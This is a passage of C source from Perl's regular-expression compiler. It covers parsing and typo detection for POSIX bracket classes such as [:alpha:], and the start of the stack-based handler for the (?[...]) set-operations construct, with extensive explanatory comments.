/* For [. .] and [= =]. These are quite different internally from [: :],
* so they are handled separately. */
if (POSIXCC_NOTYET(*p) && p < e - 3) /* 1 for the close, and 1 for the ']'
and 1 for at least one char in it
*/
{
const char open_char = *p;
const char * temp_ptr = p + 1;
/* These two constructs are not handled by perl, and if we find a
* syntactically valid one, we croak. khw, who wrote this code, finds
* this explanation of them very unclear:
* http://pubs.opengroup.org/onlinepubs/009696899/basedefs/xbd_chap09.html
* And searching the rest of the internet wasn't very helpful either.
* It looks like just about any byte can be in these constructs,
* depending on the locale. But unless the pattern is being compiled
* under /l, which is very rare, Perl runs under the C or POSIX locale.
* In that case, it looks like [= =] isn't allowed at all, and that
* [. .] could be any single code point, but for longer strings the
* constituent characters would have to be the ASCII alphabetics plus
* the minus-hyphen. Any sensible locale definition would limit itself
* to these. And any portable one definitely should. Trying to parse
* the general case is a nightmare (see [perl #127604]). So, this code
* looks only for interiors of these constructs that match:
* qr/.|[-\w]{2,}/
* Using \w relaxes the apparent rules a little, without adding much
* danger of mistaking something else for one of these constructs.
*
* [. .] in some implementations described on the internet is usable to
* escape a character that otherwise is special in bracketed character
* classes. For example [.].] means a literal right bracket instead of
* the ending of the class
*
* [= =] can legitimately contain a [. .] construct, but we don't
* handle this case, as that [. .] construct will later get parsed
* itself and croak then. And [= =] is checked for even when not under
* /l, as Perl has long done so.
*
* The code below relies on there being a trailing NUL, so it doesn't
* have to keep checking if the parse ptr < e.
*/
if (temp_ptr[1] == open_char) {
temp_ptr++;
}
else while ( temp_ptr < e
&& (isWORDCHAR(*temp_ptr) || *temp_ptr == '-'))
{
temp_ptr++;
}
if (*temp_ptr == open_char) {
temp_ptr++;
if (*temp_ptr == ']') {
temp_ptr++;
if (! found_problem && ! check_only) {
RExC_parse = (char *) temp_ptr;
vFAIL3("POSIX syntax [%c %c] is reserved for future "
"extensions", open_char, open_char);
}
/* Here, the syntax wasn't completely valid, or else the call
* is to check-only */
if (updated_parse_ptr) {
*updated_parse_ptr = (char *) temp_ptr;
}
CLEAR_POSIX_WARNINGS_AND_RETURN(OOB_NAMEDCLASS);
}
}
/* If we find something that started out to look like one of these
* constructs, but isn't, we continue below so that it can be checked
* for being a class name with a typo of '.' or '=' instead of a colon.
* */
}
/* Here, we think there is a possibility that a [: :] class was meant, and
* we have the first real character. It could be they think the '^' comes
* first */
if (*p == '^') {
found_problem = TRUE;
ADD_POSIX_WARNING(p + 1, "the '^' must come after the colon");
complement = 1;
p++;
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
}
/* But the first character should be a colon, which they could have easily
* mistyped on a qwerty keyboard as a semi-colon (and which may be hard to
* distinguish from a colon, so treat that as a colon). */
if (*p == ':') {
p++;
has_opening_colon = TRUE;
}
else if (*p == ';') {
found_problem = TRUE;
p++;
ADD_POSIX_WARNING(p, SEMI_COLON_POSIX_WARNING);
has_opening_colon = TRUE;
}
else {
found_problem = TRUE;
ADD_POSIX_WARNING(p, "there must be a starting ':'");
/* Consider an initial punctuation (not one of the recognized ones) to
* be a left terminator */
if (*p != '^' && *p != ']' && isPUNCT(*p)) {
p++;
}
}
/* They may think that you can put spaces between the components */
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
if (*p == '^') {
/* We consider something like [^:^alnum:]] to not have been intended to
* be a posix class, but XXX maybe we should */
if (complement) {
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
complement = 1;
p++;
}
/* Again, they may think that you can put spaces between the components */
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
if (*p == ']') {
/* XXX This ']' may be a typo, and something else was meant. But
* treating it as such creates enough complications, that that
* possibility isn't currently considered here. So we assume that the
* ']' is what is intended, and if we've already found an initial '[',
* this leaves this construct looking like [:] or [:^], which almost
* certainly weren't intended to be posix classes */
if (has_opening_bracket) {
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* But this function can be called when we parse the colon for
* something like qr/[alpha:]]/, so we back up to look for the
* beginning */
p--;
if (*p == ';') {
found_problem = TRUE;
ADD_POSIX_WARNING(p, SEMI_COLON_POSIX_WARNING);
}
else if (*p != ':') {
/* XXX We are currently very restrictive here, so this code doesn't
* consider the possibility that, say, /[alpha.]]/ was intended to
* be a posix class. */
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* Here we have something like 'foo:]'. There was no initial colon,
* and we back up over 'foo. XXX Unlike the going forward case, we
* don't handle typos of non-word chars in the middle */
has_opening_colon = FALSE;
p--;
while (p > RExC_start && isWORDCHAR(*p)) {
p--;
}
p++;
/* Here, we have positioned ourselves to where we think the first
* character in the potential class is */
}
/* Now the interior really starts. There are certain key characters that
* can end the interior, or these could just be typos. To catch both
* cases, we may have to do two passes. In the first pass, we keep on
* going unless we come to a sequence that matches
* qr/ [[:punct:]] [[:blank:]]* \] /xa
* This means it takes a sequence to end the pass, so two typos in a row if
* that wasn't what was intended. If the class is perfectly formed, just
* this one pass is needed. We also stop if there are too many characters
* being accumulated, but this number is deliberately set higher than any
* real class. It is set high enough so that someone who thinks that
* 'alphanumeric' is a correct name would get warned that it wasn't.
* While doing the pass, we keep track of where the key characters were in
* it. If we don't find an end to the class, and one of the key characters
* was found, we redo the pass, but stop when we get to that character.
* Thus the key character was considered a typo in the first pass, but a
* terminator in the second. If two key characters are found, we stop at
* the second one in the first pass. Again this can miss two typos, but
* catches a single one
*
* In the first pass, 'possible_end' starts as NULL, and then gets set to
* point to the first key character. For the second pass, it starts as -1.
* */
name_start = p;
parse_name:
{
bool has_blank = FALSE;
bool has_upper = FALSE;
bool has_terminating_colon = FALSE;
bool has_terminating_bracket = FALSE;
bool has_semi_colon = FALSE;
unsigned int name_len = 0;
int punct_count = 0;
while (p < e) {
/* Squeeze out blanks when looking up the class name below */
if (isBLANK(*p) ) {
has_blank = TRUE;
found_problem = TRUE;
p++;
continue;
}
/* The name will end with a punctuation */
if (isPUNCT(*p)) {
const char * peek = p + 1;
/* Treat any non-']' punctuation followed by a ']' (possibly
* with intervening blanks) as trying to terminate the class.
* ']]' is very likely to mean a class was intended (but
* missing the colon), but the warning message that gets
* generated shows the error position better if we exit the
* loop at the bottom (eventually), so skip it here. */
if (*p != ']') {
if (peek < e && isBLANK(*peek)) {
has_blank = TRUE;
found_problem = TRUE;
do {
peek++;
} while (peek < e && isBLANK(*peek));
}
if (peek < e && *peek == ']') {
has_terminating_bracket = TRUE;
if (*p == ':') {
has_terminating_colon = TRUE;
}
else if (*p == ';') {
has_semi_colon = TRUE;
has_terminating_colon = TRUE;
}
else {
found_problem = TRUE;
}
p = peek + 1;
goto try_posix;
}
}
/* Here we have punctuation we thought didn't end the class.
* Keep track of the position of the key characters that are
* more likely to have been class-enders */
if (*p == ']' || *p == '[' || *p == ':' || *p == ';') {
/* Allow just one such possible class-ender not actually
* ending the class. */
if (possible_end) {
break;
}
possible_end = p;
}
/* If we have too many punctuation characters, no use in
* keeping going */
if (++punct_count > max_distance) {
break;
}
/* Treat the punctuation as a typo. */
input_text[name_len++] = *p;
p++;
}
else if (isUPPER(*p)) { /* Use lowercase for lookup */
input_text[name_len++] = toLOWER(*p);
has_upper = TRUE;
found_problem = TRUE;
p++;
} else if (! UTF || UTF8_IS_INVARIANT(*p)) {
input_text[name_len++] = *p;
p++;
}
else {
input_text[name_len++] = utf8_to_uvchr_buf((U8 *) p, e, NULL);
p+= UTF8SKIP(p);
}
/* The declaration of 'input_text' is how long we allow a potential
* class name to be, before saying they didn't mean a class name at
* all */
if (name_len >= C_ARRAY_LENGTH(input_text)) {
break;
}
}
/* We get to here when the possible class name hasn't been properly
* terminated before:
* 1) we ran off the end of the pattern; or
* 2) found two characters, each of which might have been intended to
* be the name's terminator
* 3) found so many punctuation characters in the purported name,
* that the edit distance to a valid one is exceeded
* 4) we decided it was more characters than anyone could have
* intended to be one. */
found_problem = TRUE;
/* In the final two cases, we know that looking up what we've
* accumulated won't lead to a match, even a fuzzy one. */
if ( name_len >= C_ARRAY_LENGTH(input_text)
|| punct_count > max_distance)
{
/* If there was an intermediate key character that could have been
* an intended end, redo the parse, but stop there */
if (possible_end && possible_end != (char *) -1) {
possible_end = (char *) -1; /* Special signal value to say
we've done a first pass */
p = name_start;
goto parse_name;
}
/* Otherwise, it can't have meant to have been a class */
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* If we ran off the end, and the final character was a punctuation
* one, back up one, to look at that final one just below. Later, we
* will restore the parse pointer if appropriate */
if (name_len && p == e && isPUNCT(*(p-1))) {
p--;
name_len--;
}
if (p < e && isPUNCT(*p)) {
if (*p == ']') {
has_terminating_bracket = TRUE;
/* If this is a 2nd ']', and the first one is just below this
* one, consider that to be the real terminator. This gives a
* uniform and better positioning for the warning message */
if ( possible_end
&& possible_end != (char *) -1
&& *possible_end == ']'
&& name_len && input_text[name_len - 1] == ']')
{
name_len--;
p = possible_end;
/* And this is actually equivalent to having done the 2nd
* pass now, so set it to not try again */
possible_end = (char *) -1;
}
}
else {
if (*p == ':') {
has_terminating_colon = TRUE;
}
else if (*p == ';') {
has_semi_colon = TRUE;
has_terminating_colon = TRUE;
}
p++;
}
}
try_posix:
/* Here, we have a class name to look up. We can short circuit the
* stuff below for short names that can't possibly be meant to be a
* class name. (We can do this on the first pass, as any second pass
* will yield an even shorter name) */
if (name_len < 3) {
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* Find which class it is. Initially switch on the length of the name.
* */
switch (name_len) {
case 4:
if (memEQs(name_start, 4, "word")) {
/* this is not POSIX, this is the Perl \w */
class_number = ANYOF_WORDCHAR;
}
break;
case 5:
/* Names all of length 5: alnum alpha ascii blank cntrl digit
* graph lower print punct space upper
* Offset 4 gives the best switch position. */
switch (name_start[4]) {
case 'a':
if (memBEGINs(name_start, 5, "alph")) /* alpha */
class_number = ANYOF_ALPHA;
break;
case 'e':
if (memBEGINs(name_start, 5, "spac")) /* space */
class_number = ANYOF_SPACE;
break;
case 'h':
if (memBEGINs(name_start, 5, "grap")) /* graph */
class_number = ANYOF_GRAPH;
break;
case 'i':
if (memBEGINs(name_start, 5, "asci")) /* ascii */
class_number = ANYOF_ASCII;
break;
case 'k':
if (memBEGINs(name_start, 5, "blan")) /* blank */
class_number = ANYOF_BLANK;
break;
case 'l':
if (memBEGINs(name_start, 5, "cntr")) /* cntrl */
class_number = ANYOF_CNTRL;
break;
case 'm':
if (memBEGINs(name_start, 5, "alnu")) /* alnum */
class_number = ANYOF_ALPHANUMERIC;
break;
case 'r':
if (memBEGINs(name_start, 5, "lowe")) /* lower */
class_number = (FOLD) ? ANYOF_CASED : ANYOF_LOWER;
else if (memBEGINs(name_start, 5, "uppe")) /* upper */
class_number = (FOLD) ? ANYOF_CASED : ANYOF_UPPER;
break;
case 't':
if (memBEGINs(name_start, 5, "digi")) /* digit */
class_number = ANYOF_DIGIT;
else if (memBEGINs(name_start, 5, "prin")) /* print */
class_number = ANYOF_PRINT;
else if (memBEGINs(name_start, 5, "punc")) /* punct */
class_number = ANYOF_PUNCT;
break;
}
break;
case 6:
if (memEQs(name_start, 6, "xdigit"))
class_number = ANYOF_XDIGIT;
break;
}
/* If the name exactly matches a posix class name the class number will
* here be set to it, and the input almost certainly was meant to be a
* posix class, so we can skip further checking. If instead the syntax
* is exactly correct, but the name isn't one of the legal ones, we
* will return that as an error below. But if neither of these apply,
* it could be that no posix class was intended at all, or that one
* was, but there was a typo. We tease these apart by doing fuzzy
* matching on the name */
if (class_number == OOB_NAMEDCLASS && found_problem) {
const UV posix_names[][6] = {
{ 'a', 'l', 'n', 'u', 'm' },
{ 'a', 'l', 'p', 'h', 'a' },
{ 'a', 's', 'c', 'i', 'i' },
{ 'b', 'l', 'a', 'n', 'k' },
{ 'c', 'n', 't', 'r', 'l' },
{ 'd', 'i', 'g', 'i', 't' },
{ 'g', 'r', 'a', 'p', 'h' },
{ 'l', 'o', 'w', 'e', 'r' },
{ 'p', 'r', 'i', 'n', 't' },
{ 'p', 'u', 'n', 'c', 't' },
{ 's', 'p', 'a', 'c', 'e' },
{ 'u', 'p', 'p', 'e', 'r' },
{ 'w', 'o', 'r', 'd' },
{ 'x', 'd', 'i', 'g', 'i', 't' }
};
/* The names of the above all have added NULs to make them the same
* size, so we need to also have the real lengths */
const UV posix_name_lengths[] = {
sizeof("alnum") - 1,
sizeof("alpha") - 1,
sizeof("ascii") - 1,
sizeof("blank") - 1,
sizeof("cntrl") - 1,
sizeof("digit") - 1,
sizeof("graph") - 1,
sizeof("lower") - 1,
sizeof("print") - 1,
sizeof("punct") - 1,
sizeof("space") - 1,
sizeof("upper") - 1,
sizeof("word") - 1,
sizeof("xdigit")- 1
};
unsigned int i;
int temp_max = max_distance; /* Use a temporary, so if we
reparse, we haven't changed the
outer one */
/* Use a smaller max edit distance if we are missing one of the
* delimiters */
if ( has_opening_bracket + has_opening_colon < 2
|| has_terminating_bracket + has_terminating_colon < 2)
{
temp_max--;
}
/* See if the input name is close to a legal one */
for (i = 0; i < C_ARRAY_LENGTH(posix_names); i++) {
/* Short circuit call if the lengths are too far apart to be
* able to match */
if (abs( (int) (name_len - posix_name_lengths[i]))
> temp_max)
{
continue;
}
if (edit_distance(input_text,
posix_names[i],
name_len,
posix_name_lengths[i],
temp_max
)
> -1)
{ /* If it is close, it probably was intended to be a class */
goto probably_meant_to_be;
}
}
/* Here the input name is not close enough to a valid class name
* for us to consider it to be intended to be a posix class. If
* we haven't already done so, and the parse found a character that
* could have been terminators for the name, but which we absorbed
* as typos during the first pass, repeat the parse, signalling it
* to stop at that character */
if (possible_end && possible_end != (char *) -1) {
possible_end = (char *) -1;
p = name_start;
goto parse_name;
}
/* Here neither pass found a close-enough class name */
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
probably_meant_to_be:
/* Here we think that a posix specification was intended. Update any
* parse pointer */
if (updated_parse_ptr) {
*updated_parse_ptr = (char *) p;
}
/* If a posix class name was intended but incorrectly specified, we
* output or return the warnings */
if (found_problem) {
/* We set flags for these issues in the parse loop above instead of
* adding them to the list of warnings, because we can parse it
* twice, and we only want one warning instance */
if (has_upper) {
ADD_POSIX_WARNING(p, "the name must be all lowercase letters");
}
if (has_blank) {
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
if (has_semi_colon) {
ADD_POSIX_WARNING(p, SEMI_COLON_POSIX_WARNING);
}
else if (! has_terminating_colon) {
ADD_POSIX_WARNING(p, "there is no terminating ':'");
}
if (! has_terminating_bracket) {
ADD_POSIX_WARNING(p, "there is no terminating ']'");
}
if ( posix_warnings
&& RExC_warn_text
&& av_top_index(RExC_warn_text) > -1)
{
*posix_warnings = RExC_warn_text;
}
}
else if (class_number != OOB_NAMEDCLASS) {
/* If it is a known class, return the class. The class number
* #defines are structured so each complement is +1 to the normal
* one */
CLEAR_POSIX_WARNINGS_AND_RETURN(class_number + complement);
}
else if (! check_only) {
/* Here, it is an unrecognized class. This is an error (unless the
* call is to check only, which we've already handled above) */
const char * const complement_string = (complement)
? "^"
: "";
RExC_parse = (char *) p;
vFAIL3utf8f("POSIX class [:%s%" UTF8f ":] unknown",
complement_string,
UTF8fARG(UTF, RExC_parse - name_start - 2, name_start));
}
}
return OOB_NAMEDCLASS;
}
#undef ADD_POSIX_WARNING
STATIC unsigned int
S_regex_set_precedence(const U8 my_operator) {
/* Returns the precedence in the (?[...]) construct of the input operator,
* specified by its character representation. The precedence follows
* general Perl rules, but it extends this so that ')' and ']' have (low)
* precedence even though they aren't really operators */
switch (my_operator) {
case '!':
return 5;
case '&':
return 4;
case '^':
case '|':
case '+':
case '-':
return 3;
case ')':
return 2;
case ']':
return 1;
}
NOT_REACHED; /* NOTREACHED */
return 0; /* Silence compiler warning */
}
STATIC regnode_offset
S_handle_regex_sets(pTHX_ RExC_state_t *pRExC_state, SV** return_invlist,
I32 *flagp, U32 depth,
char * const oregcomp_parse)
{
/* Handle the (?[...]) construct to do set operations */
U8 curchar; /* Current character being parsed */
UV start, end; /* End points of code point ranges */
SV* final = NULL; /* The end result inversion list */
SV* result_string; /* 'final' stringified */
AV* stack; /* stack of operators and operands not yet
resolved */
AV* fence_stack = NULL; /* A stack containing the positions in
'stack' of where the undealt-with left
parens would be if they were actually
put there */
/* The 'volatile' is a workaround for an optimiser bug
* in Solaris Studio 12.3. See RT #127455 */
volatile IV fence = 0; /* Position of where most recent undealt-
with left paren in stack is; -1 if none.
*/
STRLEN len; /* Temporary */
regnode_offset node; /* Temporary, and final regnode returned by
this function */
const bool save_fold = FOLD; /* Temporary */
char *save_end, *save_parse; /* Temporaries */
const bool in_locale = LOC; /* we turn off /l during processing */
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_HANDLE_REGEX_SETS;
DEBUG_PARSE("xcls");
if (in_locale) {
set_regex_charset(&RExC_flags, REGEX_UNICODE_CHARSET);
}
/* The use of this operator implies /u. This is required so that the
* compile time values are valid in all runtime cases */
REQUIRE_UNI_RULES(flagp, 0);
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__REGEX_SETS,
"The regex_sets feature is experimental");
/* Everything in this construct is a metacharacter. Operands begin with
* either a '\' (for an escape sequence), or a '[' for a bracketed
* character class. Any other character should be an operator, or
* parenthesis for grouping. Both types of operands are handled by calling
* regclass() to parse them. It is called with a parameter to indicate to
* return the computed inversion list. The parsing here is implemented via
* a stack. Each entry on the stack is a single character representing one
* of the operators; or else a pointer to an operand inversion list. */
#define IS_OPERATOR(a) SvIOK(a)
#define IS_OPERAND(a) (! IS_OPERATOR(a))
/* The stack is kept in Łukasiewicz order. (That's pronounced similar
* to luke-a-shave-itch (or -itz), but people who didn't want to bother
* with pronouncing it called it Reverse Polish instead, but now that YOU
* know how to pronounce it you can use the correct term, thus giving due
* credit to the person who invented it, and impressing your geek friends.
* Wikipedia says that the pronounciation of "Ł" has been changing so that
* it is now more like an English initial W (as in wonk) than an L.)
*
* This means that, for example, 'a | b & c' is stored on the stack as
*
* c [4]
* b [3]
* & [2]
* a [1]
* | [0]
*
* where the numbers in brackets give the stack [array] element number.
* In this implementation, parentheses are not stored on the stack.
* Instead a '(' creates a "fence" so that the part of the stack below the
* fence is invisible except to the corresponding ')' (this allows us to
* replace testing for parens, by using instead subtraction of the fence
* position). As new operands are processed they are pushed onto the stack
* (except as noted in the next paragraph). New operators of higher
* precedence than the current final one are inserted on the stack before
* the lhs operand (so that when the rhs is pushed next, everything will be
* in the correct positions shown above. When an operator of equal or
* lower precedence is encountered in parsing, all the stacked operations
* of equal or higher precedence are evaluated, leaving the result as the
* top entry on the stack. This makes higher precedence operations
* evaluate before lower precedence ones, and causes operations of equal
* precedence to left associate.
*
* The only unary operator '!' is immediately pushed onto the stack when
* encountered. When an operand is encountered, if the top of the stack is
* a '!", the complement is immediately performed, and the '!' popped. The
* resulting value is treated as a new operand, and the logic in the
* previous paragraph is executed. Thus in the expression
* [a] + ! [b]
* the stack looks like
*
* !
* a
* +
*
* as 'b' gets parsed, the latter gets evaluated to '!b', and the stack
* becomes
*
* !b
* a
* +
*
* A ')' is treated as an operator with lower precedence than all the
* aforementioned ones, which causes all operations on the stack above the
* corresponding '(' to be evaluated down to a single resultant operand.
* Then the fence for the '(' is removed, and the operand goes through the
* algorithm above, without the fence.
*
* A separate stack is kept of the fence positions, so that the position of
* the latest so-far unbalanced '(' is at the top of it.
*
* The ']' ending the construct is treated as the lowest operator of all,
* so that everything gets evaluated down to a single operand, which is the
* result */
sv_2mortal((SV *)(stack = newAV()));
sv_2mortal((SV *)(fence_stack = newAV()));
while (RExC_parse < RExC_end) {
I32 top_index; /* Index of top-most element in 'stack' */
SV** top_ptr; /* Pointer to top 'stack' element */
SV* current = NULL; /* To contain the current inversion list
operand */
SV* only_to_avoid_leaks;
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
TRUE /* Force /x */ );
if (RExC_parse >= RExC_end) { /* Fail */
break;
}
curchar = UCHARAT(RExC_parse);
redo_curchar:
#ifdef ENABLE_REGEX_SETS_DEBUGGING
/* Enable with -Accflags=-DENABLE_REGEX_SETS_DEBUGGING */
DEBUG_U(dump_regex_sets_structures(pRExC_state,
stack, fence, fence_stack));
#endif
top_index = av_tindex_skip_len_mg(stack);
switch (curchar) {
SV** stacked_ptr; /* Ptr to something already on 'stack' */
char stacked_operator; /* The topmost operator on the 'stack'. */
SV* lhs; /* Operand to the left of the operator */
SV* rhs; /* Operand to the right of the operator */
SV* fence_ptr; /* Pointer to top element of the fence
stack */
case '(':
if ( RExC_parse < RExC_end - 2
&& UCHARAT(RExC_parse + 1) == '?'
&& UCHARAT(RExC_parse + 2) == '^')
{
/* If is a '(?', could be an embedded '(?^flags:(?[...])'.
* This happens when we have some thing like
*
* my $thai_or_lao = qr/(?[ \p{Thai} + \p{Lao} ])/;
* ...
* qr/(?[ \p{Digit} & $thai_or_lao ])/;
*
* Here we would be handling the interpolated
* '$thai_or_lao'. We handle this by a recursive call to
* ourselves which returns the inversion list the
* interpolated expression evaluates to. We use the flags
* from the interpolated pattern. */
U32 save_flags = RExC_flags;
const char * save_parse;
RExC_parse += 2; /* Skip past the '(?' */
save_parse = RExC_parse;
/* Parse the flags for the '(?'. We already know the first
* flag to parse is a '^' */
parse_lparen_question_flags(pRExC_state);
if ( RExC_parse >= RExC_end - 4
|| UCHARAT(RExC_parse) != ':'
|| UCHARAT(++RExC_parse) != '('
|| UCHARAT(++RExC_parse) != '?'
|| UCHARAT(++RExC_parse) != '[')
{
/* In combination with the above, this moves the
* pointer to the point just after the first erroneous
* character. */
if (RExC_parse >= RExC_end - 4) {
RExC_parse = RExC_end;
}
else if (RExC_parse != save_parse) {
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
}
vFAIL("Expecting '(?flags:(?[...'");
}
/* Recurse, with the meat of the embedded expression */
RExC_parse++;
if (! handle_regex_sets(pRExC_state, ¤t, flagp,
depth+1, oregcomp_parse))
{
RETURN_FAIL_ON_RESTART(*flagp, flagp);
}
/* Here, 'current' contains the embedded expression's
* inversion list, and RExC_parse points to the trailing
* ']'; the next character should be the ')' */
RExC_parse++;
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for nested extended charclass");
/* Then the ')' matching the original '(' handled by this
* case: statement */
RExC_parse++;
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for wrapper for nested extended charclass");
RExC_flags = save_flags;
goto handle_operand;
}
/* A regular '('. Look behind for illegal syntax */
if (top_index - fence >= 0) {
/* If the top entry on the stack is an operator, it had
* better be a '!', otherwise the entry below the top
* operand should be an operator */
if ( ! (top_ptr = av_fetch(stack, top_index, FALSE))
|| (IS_OPERATOR(*top_ptr) && SvUV(*top_ptr) != '!')
|| ( IS_OPERAND(*top_ptr)
&& ( top_index - fence < 1
|| ! (stacked_ptr = av_fetch(stack,
top_index - 1,
FALSE))
|| ! IS_OPERATOR(*stacked_ptr))))
{
RExC_parse++;
vFAIL("Unexpected '(' with no preceding operator");
}
}
/* Stack the position of this undealt-with left paren */
av_push(fence_stack, newSViv(fence));
fence = top_index + 1;
break;
case '\\':
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if
* multi-char folds are allowed. */
if (!regclass(pRExC_state, flagp, depth+1,
TRUE, /* means parse just the next thing */
FALSE, /* don't allow multi-char folds */
FALSE, /* don't silence non-portable warnings. */
TRUE, /* strict */
FALSE, /* Require return to be an ANYOF */
¤t))
{
RETURN_FAIL_ON_RESTART(*flagp, flagp);
goto regclass_failed;
}
/* regclass() will return with parsing just the \ sequence,
* leaving the parse pointer at the next thing to parse */
RExC_parse--;
goto handle_operand;
case '[': /* Is a bracketed character class */
{
/* See if this is a [:posix:] class. */
bool is_posix_class = (OOB_NAMEDCLASS
< handle_possible_posix(pRExC_state,
RExC_parse + 1,
NULL,
NULL,
TRUE /* checking only */));
/* If it is a posix class, leave the parse pointer at the '['
* to fool regclass() into thinking it is part of a
* '[[:posix:]]'. */
if (! is_posix_class) {
RExC_parse++;
}
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if
* multi-char folds are allowed. */
if (!regclass(pRExC_state, flagp, depth+1,
is_posix_class, /* parse the whole char
class only if not a
posix class */
FALSE, /* don't allow multi-char folds */
TRUE, /* silence non-portable warnings. */
TRUE, /* strict */
FALSE, /* Require return to be an ANYOF */
¤t))
{
RETURN_FAIL_ON_RESTART(*flagp, flagp);
goto regclass_failed;
}
if (! current) {
break;
}
/* function call leaves parse pointing to the ']', except if we
* faked it */
if (is_posix_class) {
RExC_parse--;
}
goto handle_operand;
}
case ']':
if (top_index >= 1) {
goto join_operators;
}
/* Only a single operand on the stack: are done */
goto done;
case ')':
if (av_tindex_skip_len_mg(fence_stack) < 0) {
if (UCHARAT(RExC_parse - 1) == ']') {
break;
}
RExC_parse++;
vFAIL("Unexpected ')'");
}
/* If nothing after the fence, is missing an operand */
if (top_index - fence < 0) {
RExC_parse++;
goto bad_syntax;
}
/* If at least two things on the stack, treat this as an
* operator */
if (top_index - fence >= 1) {
goto join_operators;
}
/* Here only a single thing on the fenced stack, and there is a
* fence. Get rid of it */
fence_ptr = av_pop(fence_stack);
assert(fence_ptr);
fence = SvIV(fence_ptr);
SvREFCNT_dec_NN(fence_ptr);
fence_ptr = NULL;
if (fence < 0) {
fence = 0;
}
/* Having gotten rid of the fence, we pop the operand at the
* stack top and process it as a newly encountered operand */
current = av_pop(stack);
if (IS_OPERAND(current)) {
goto handle_operand;
}
RExC_parse++;
goto bad_syntax;
case '&':
case '|':
case '+':
case '-':
case '^':
/* These binary operators should have a left operand already
* parsed */
if ( top_index - fence < 0
|| top_index - fence == 1
|| ( ! (top_ptr = av_fetch(stack, top_index, FALSE)))
|| ! IS_OPERAND(*top_ptr))
{
goto unexpected_binary;
}
/* If only the one operand is on the part of the stack visible
* to us, we just place this operator in the proper position */
if (top_index - fence < 2) {
/* Place the operator before the operand */
SV* lhs = av_pop(stack);
av_push(stack, newSVuv(curchar));
av_push(stack, lhs);
break;
}
/* But if there is something else on the stack, we need to
* process it before this new operator if and only if the
* stacked operation has equal or higher precedence than the
* new one */
join_operators:
/* The operator on the stack is supposed to be below both its
* operands */
if ( ! (stacked_ptr = av_fetch(stack, top_index - 2, FALSE))
|| IS_OPERAND(*stacked_ptr))
{
/* But if not, it's legal and indicates we are completely
* done if and only if we're currently processing a ']',
* which should be the final thing in the expression */
if (curchar == ']') {
goto done;
}
unexpected_binary:
RExC_parse++;
vFAIL2("Unexpected binary operator '%c' with no "
"preceding operand", curchar);
}
stacked_operator = (char) SvUV(*stacked_ptr);
if (regex_set_precedence(curchar)
> regex_set_precedence(stacked_operator))
{
/* Here, the new operator has higher precedence than the
* stacked one. This means we need to add the new one to
* the stack to await its rhs operand (and maybe more
* stuff). We put it before the lhs operand, leaving
* untouched the stacked operator and everything below it
* */
lhs = av_pop(stack);
assert(IS_OPERAND(lhs));
av_push(stack, newSVuv(curchar));
av_push(stack, lhs);
break;
}
/* Here, the new operator has equal or lower precedence than
* what's already there. This means the operation already
* there should be performed now, before the new one. */
rhs = av_pop(stack);
if (! IS_OPERAND(rhs)) {
/* This can happen when a ! is not followed by an operand,
* like in /(?[\t &!])/ */
goto bad_syntax;
}
lhs = av_pop(stack);
if (! IS_OPERAND(lhs)) {
/* This can happen when there is an empty (), like in
* /(?[[0]+()+])/ */
goto bad_syntax;
}
switch (stacked_operator) {
case '&':
_invlist_intersection(lhs, rhs, &rhs);
break;
case '|':
case '+':
_invlist_union(lhs, rhs, &rhs);
break;
case '-':
_invlist_subtract(lhs, rhs, &rhs);
break;
case '^': /* The union minus the intersection */
{
SV* i = NULL;
SV* u = NULL;
_invlist_union(lhs, rhs, &u);
_invlist_intersection(lhs, rhs, &i);
_invlist_subtract(u, i, &rhs);
SvREFCNT_dec_NN(i);
SvREFCNT_dec_NN(u);
break;
}
}
SvREFCNT_dec(lhs);
/* Here, the higher precedence operation has been done, and the
* result is in 'rhs'. We overwrite the stacked operator with
* the result. Then we redo this code to either push the new
* operator onto the stack or perform any higher precedence
* stacked operation */
only_to_avoid_leaks = av_pop(stack);
SvREFCNT_dec(only_to_avoid_leaks);
av_push(stack, rhs);
goto redo_curchar;
case '!': /* Highest priority, right associative */
/* If what's already at the top of the stack is another '!",
* they just cancel each other out */
if ( (top_ptr = av_fetch(stack, top_index, FALSE))
&& (IS_OPERATOR(*top_ptr) && SvUV(*top_ptr) == '!'))
{
only_to_avoid_leaks = av_pop(stack);
SvREFCNT_dec(only_to_avoid_leaks);
}
else { /* Otherwise, since it's right associative, just push
onto the stack */
av_push(stack, newSVuv(curchar));
}
break;
default:
RExC_parse += (UTF) ? UTF8SKIP(RExC_parse) : 1;
if (RExC_parse >= RExC_end) {
break;
}
vFAIL("Unexpected character");
handle_operand:
/* Here 'current' is the operand. If something is already on the
* stack, we have to check if it is a !. But first, the code above
* may have altered the stack in the time since we earlier set
* 'top_index'. */
top_index = av_tindex_skip_len_mg(stack);
if (top_index - fence >= 0) {
/* If the top entry on the stack is an operator, it had better
* be a '!', otherwise the entry below the top operand should
* be an operator */
